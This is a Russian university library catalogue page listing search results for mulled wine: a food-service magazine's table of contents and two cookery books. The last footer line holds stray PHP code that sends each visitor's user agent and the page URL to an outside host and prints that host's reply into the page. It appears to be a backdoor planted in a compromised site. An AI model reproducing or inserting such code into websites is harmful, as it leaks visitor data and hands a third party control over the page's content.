Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

283 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Глинтвейн")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 3
1. 
Общепит: бизнес и искусство. - Журнал, 2018г. № 6
Оглавление 
  • Дакбас, Ж. Монгольская кухня и брендовые блюда / Ж. Дакбас, Г. Г. Дубцов. - с.14-18
    Кл. слова: кумыс, хорхог, бууз
  • Ежевикина, Л. Окно на кухне: оформляем, украшаем и превращаем в стол / Л. Ежевикина. - с.10-13
    Кл. слова: дизайн помещения, подоконник, драпировка
  • Елисеев, М. Н. Системы управления качеством пищевых продуктов, закупаемых для предприятий общественного питания / М. Н. Елисеев, Т. И. Чалых, Е. Ю. Райкова. - с.20-29. - Библиогр. в конце ст.
    Кл. слова: общепит, система менеджмента, система ХАССП
  • Васильева, К. Как сделать русскую картошку фри / К. Васильева. - с.30-35
    Кл. слова: общепит, производственный комплекс, оборудование
  • Уткина, А. Национальные и международные требования к показателям качества коньяка / А. Уткина. - с.36-38
    Кл. слова: коньячный продукт, виноматериал, рекомендации
  • Фадеева, И. Традиционные напитки народов мира / И. Фадеева, Ж. В. Новикова, Р. М. Машитлев. - с.39-44
    Кл. слова: кальвадос, кава, аяваски
  • Ежевикина, Л. Глинтвейн - средство от простуды, хандры и бессонницы / Л. Ежевикина. - с.45-47
    Кл. слова: напитки, история, специи
  • Ковалев, В. А. Кулинарные жиры в питании населения / В. А. Ковалев, О. В. Беспалова. - с.48-50
    Кл. слова: общепит, фритюрная жарка, качество жиров
  • Котова, Т. В. Тонизирующие напитки: эффективность, безопасность, значение в питании / ; Т. В. Котова, В. А. Поляков. - с.51-55
    Кл. слова: кофеинсодержащие напитки, пищевая промышленность, растительное сырье
Держатели документа (Информация об экземплярах) 
2. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
3. 
Кулькова Л. В. Приготовление коктейлей и других смешанных напитков [Текст] : Учеб. пособие / Л. В. Кулькова, 2002. - 376 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3216 - 30.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.16 с.14 запросов, 1.17c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;